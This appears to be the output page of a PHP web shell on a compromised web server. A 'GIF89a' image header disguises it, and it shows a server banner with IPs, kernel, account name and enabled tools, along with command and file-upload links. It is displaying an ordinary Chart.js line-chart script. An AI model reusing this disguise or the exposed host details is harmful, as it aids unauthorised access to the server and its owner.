GIF89a;
Server IP : 172.26.0.195 / Your IP : 18.117.12.181 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../css/../jobs/assets/user/js/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
new Chart(document.getElementById("linechart"), { type: 'line', data: { labels: ['January', 'February', 'March', 'April', 'May', 'June', 'July'], datasets: [{ label: 'My First dataset', backgroundColor: window.chartColors.navy, borderColor: window.chartColors.navy, data: [30,10,70,15,60,20,70,80], fill: false, }, { label: 'My Second dataset', fill: false, backgroundColor: window.chartColors.purple, borderColor: window.chartColors.purple, data: [10,40,20,35,25,50,10,70], }] }, options: { responsive: true, // title: { // display: true, // text: 'Chart.js Line Chart' // }, tooltips: { mode: 'index', intersect: false, }, hover: { mode: 'nearest', intersect: true }, scales: { xAxes: [{ display: true, scaleLabel: { display: true, labelString: 'Month' } }], yAxes: [{ display: true, scaleLabel: { display: true, labelString: 'Value' } }] } } });